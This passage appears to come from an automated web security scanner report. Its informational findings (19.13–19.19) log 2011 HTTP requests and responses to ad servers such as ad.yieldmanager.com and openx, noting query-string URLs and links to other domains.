b2FH5PbRi4PUQft8hIPXsjNj60ucA0jBubXLK1EaGuwAlEPUKyOoDOQbSwLEskZRHdhJ9_BCq9AZ4lzCLz8LCFx0LMQqWwBzt6oLmbzXlxFvaQjey5gjRdf9y730X_TxHXAuaaB6eh8srs&sli=3154796&bli=2900475&exPub=425670&acp=0.0150&3c=http%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F3%2CeAGVjc1ugzAQhJ%2DGG7LADtgI9eDEUKECKa2bllwQYBNQyo8IFYSnD2po7l2ttKPZ%2EWZ1ZGPDwqKwMt0oUiwJsnUEc6zlWmFJVbNtG2JobRAhGKsXbyvovp2eR0YaL6K%2ExUz9T1LKCI28u%2E9KKBgZAMbxy787NNsF4wrh6H2V6%2D5%2Eg1nFm7Miy7816oWSYJq97SOLHco9d2A8n6D%2EeTiH3BkC7n4HO72K54%2Drz%2EPNkYtzwONrOHvX8PQgn1S1HIZOQVSB7tICDH0q5ATaTjYTyNt6MdOiB125HLlz28hKKIiZyNIVaObZoqvmIvsh6dNGtHXS%2ENSZ7JNS9vIGBcVuFw%3D%3D%2C&url=http%3A%2F%2Fd%2Etradex%2Eopenx%2Ecom%2Fafr%2Ephp%3Fzoneid%3D6391%26cb%3Dinsert%5Frandom%5Fnumber%5Fhere HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rv=1; uid=2944787775510337379; rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15228%7C15228%7C15231%7C15248

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 04 Oct 2011 23:53:01 GMT
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:53:00 GMT
Content-Length: 8525


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
{return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n\n\n     \n        \n                \n        <a target="turn_ad_landing_page" href="http://www.smokeybear.com"><img border="0" src="http://img.turn.com/img/server/ads/ps/300x250.jpg">
...[SNIP]...

19.13. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; both are shown in the request and response below.

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByKY-Z.t7RCuK-KJYcI01vgaQ38Z03jR6A1yA6AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D2486156300%26r%3D0%26s%3D2126909,56138bf2-ed52-11e0-8513-0bddcfe107c2,1317599870833 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:51 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0392.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:57:51 GMT
Pragma: no-cache
Content-Length: 1850
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599870_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGljMtuwjAQRb8mu8jyIw-jqAunbqoIjEob2sIGBdtpoCQGk4o0X4.VIH6go9HMuaM7F5EkJnFYSqpCpHAVTVSCCJYxwpQElQ-TJAlQSCCCFIf-OU8V4wjmLJ1OTwv2V3zCpyO5ySlbrEb1Qhm4cAACY8VlPJ0
...[SNIP]...
79.LpfN8tecLUXtxz3.-D7ddcdPcI8nLlWoLOl0j0wR932QJrGHcvKgmPtTJnVldXn2iM8gB6OBtPqnXIqChFyWm4d79qztt3Glq0yzab9abbabmpttTMcjHSOK5PMczU=,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599870_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599870_HERE" border="0" alt=""></a>
...[SNIP]...

19.14. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; both are shown in the request and response below.

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABop.IGXd7RCiJWsDHFLo.ek0AyhF-Ro3hPHqguAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D571789886%26r%3D0%26s%3D2126909,f60ff498-ed51-11e0-9103-78e7d1f5c918,1317599709748 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:55:18 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0310.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:55:18 GMT
Pragma: no-cache
Content-Length: 1834
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599709_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGljN1qg0AQhZ.GO1n2x58E6cXabYKYtQ1Ig7kR3d3UYHTNxhLx6bvU4gt0GGa-M5w5iET-xQuEwKGPw1oSpCJEsAgRxFW4dWEURQTiEGEvcB9JLClDMKFxmt6P9LfYlqUL2ck29Fgs6mNDwZMB4GnDn8vpzjd
...[SNIP]...
mQC--cy5afClTM7fS-PtIX123GcXAIdfDOtgSjqaSagB5UPwGhO3usLgYMjTXtjLoY9Wgcwjzo4GDWvbpKqwIfIatFbfnaP5QZS1P1Undl.93VypSNMsoablpYxw-1yHJ2,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599709_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599709_HERE" border="0" alt=""></a>
...[SNIP]...

19.15. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4YdyBk-PRCusQbehvZKWfB0V5hgpBffPI1valAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3307954001%26r%3D0%26s%3D2126909,10c779c0-ed55-11e0-acf4-78e7d1f5075a,1317601043062 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:17:28 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0388.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:17:28 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601043_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT9tqhDAQ.RrfJOTiFelD3FSQbtou2Ip9WdwkWxdXY6NF8eub1mV.oMMwc85w5gyDSELiqJZxEBPlnZCPwwQRLELshWEAXZgkCYbQ9yOCIHLHPJWUIZjTXSmCA.0LFrOnDdnKInrIN.YaUTAzADxt-LyNvng
...[SNIP]...
FbXlaIM4Gq20t2.8F1m2kaHEIdnNmUYDK1VAvQg-oXIHRnh.XZgKGxosyos1Fj4xDmQQcHq-7VRVoW-OiXi5PFl35UZjqaupe6O.bf3UmZY6OMsoKrFlbxA53ncmI=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601043_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601043_HERE" border="0" alt="">
</a>
...[SNIP]...

19.16. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8vVip5ubRCvLXWHdGFKHcFPA2DOTiN8.x2RQRAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2724012397%26r%3D0%26s%3D2126909,0c2a1d62-ed57-11e0-b5c1-78e7d15ecef4,1317601894313 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:34 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0332.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:31:34 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601894_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTdFqgzAU.RrfJCQmtRHZQ2xWkDWygijti9gYZ9dqXHTU9euXzeIP9HK595zDueciHCqCA-zV9ZpSAiU8hQh7co2RD33qwjC0HCHsk1VA3CGOKsYRjNkml.6e.RcP-NuM7OSU7eOZvVMGbhwAoo24zdKXoHC
...[SNIP]...
yri0iz68HL2mQ5ZC-u24xj72DmeFvbFRhNWakJ6F51E5C6tWJZG9A31rQ1qjZqaBzMCXQ8.647da4s81foj8uTxeduUGYsTNlVui267.akTNEoo6zhqqV1.AI7WXMy,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601894_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601894_HERE" border="0" alt="">
</a>
...[SNIP]...

19.17. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-Yu0ZA-bRCsQZtrSLd65ydPJL1siTfpfb3mHrAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D102130875%26r%3D0%26s%3D2126909,84e2f702-ed56-11e0-bfce-ffb283748b1a,1317601667355 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:28:03 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0193.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:28:03 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317601667_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT9FugjAU.RreWNOWCiVkD8VOwyZsJmZGX4y0VZhAWWGR8fU2w.gDu7m595yTc09ykRd5OJf5SVEkiMCSBBHysAiwwiGhLoyiiKDZLKBhQAO3S2LJOIIJm78If83-iof8bUJ2csrWemIflIErB4Bok14n6Tu
...[SNIP]...
Sko4Dvy2TY3V-y98-uW.R963jMwQvbEvTmKNUAdKuaAQhdW.F4MqAtrGlh1MmornA8TqCD.VE3qpSW-TMYWi5yi8umU6Y.mGMjdX1ofupcmUOhjLKGSgvruAF3gHQH,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601667_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317601667_HERE" border="0" alt="">
</a>
...[SNIP]...

19.18. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACsz19lx-DRCsq9vQINTVwfVXVwN9yiEvjgBMrqAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1723399548%26r%3D0%26s%3D2126909,664ac854-ed53-11e0-9884-8b6cf07408de,1317600327535 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:05:28 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0310.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:05:28 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317600327_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT11rgzAU.TW-SUiMn8getJlD1tgV7Mb6IjHGxrUaFx2V.vqFWfoHdrnce87h3AMX4ThgrIUMR57wEeO1GyPs8ABFQS0CG8ZxjKETIMf17SlPm4QgmCebZ-7vk78iEXldkZkkTPZqZW9hAq4EAFdpel2lbxr
...[SNIP]...
c9JRxSIs.H-0vm.sm25TyPFk4sJzPdgFmzRixAjWJYAFe9EVmrwSiNKdOi1WKSFiYutBz.pgbRNYb5HowM57XB3TAJPVeaDY3qq-Gnr4WupNDCGC6KG8cvORRylQ==,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600327_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317600327_HERE" border="0" alt="">
</a>
...[SNIP]...

19.19. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADbOeTa6OTRCv8si9N8kXiR0EpX1AjVZlwsax1SAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D2714874675%26r%3D0%26s%3D2126909,dc68cc3c-ed55-11e0-9a32-78e7d1f5c9bc,1317601384697 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:06 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0056.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:23:06 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317601384_HERE" frameborder="0" scrolling="no" width="160" height="600">
